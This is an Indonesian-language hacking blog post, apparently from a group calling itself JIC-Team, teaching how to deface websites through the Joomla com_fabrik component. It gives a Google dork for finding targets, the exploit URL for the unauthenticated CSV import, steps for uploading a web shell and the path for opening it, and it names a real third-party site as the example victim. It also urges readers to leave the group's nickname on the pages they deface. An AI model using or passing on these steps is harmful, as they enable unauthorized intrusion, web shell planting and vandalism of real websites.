Pages

Friday, 27 June 2014

Cara Deface Dengan Metode Com_Fabrik


Oke kali ini kita akan membahas tentang cara deface dengan metode COM_FABRIK

Metode ini cukup mudah bila dipelajari dengan sungguh-sungguh langsung saja

Langkah-Langkah:
1. Cari target dengan google dork ini

inurl:viewTable?cid= site:com

*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
*Usahakan jangan menggunakan site id ( mari lindungi site dalam negeri )



2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1

3. Masukkan shell milik sobat (Pilih File) dan lalu klik tombol import CSV

4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. lalu masuk ke dalam shellnya.

www.site.com/media/nama shell kamu.php

contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)

#Ingat jangan sampai "Kacang Lupa Pada Kulitnya"
Kalau berhasil titip nick Java Intelegent Cyber Yah


Sekian Semua Salam Hormat JIC-Team

2 comments: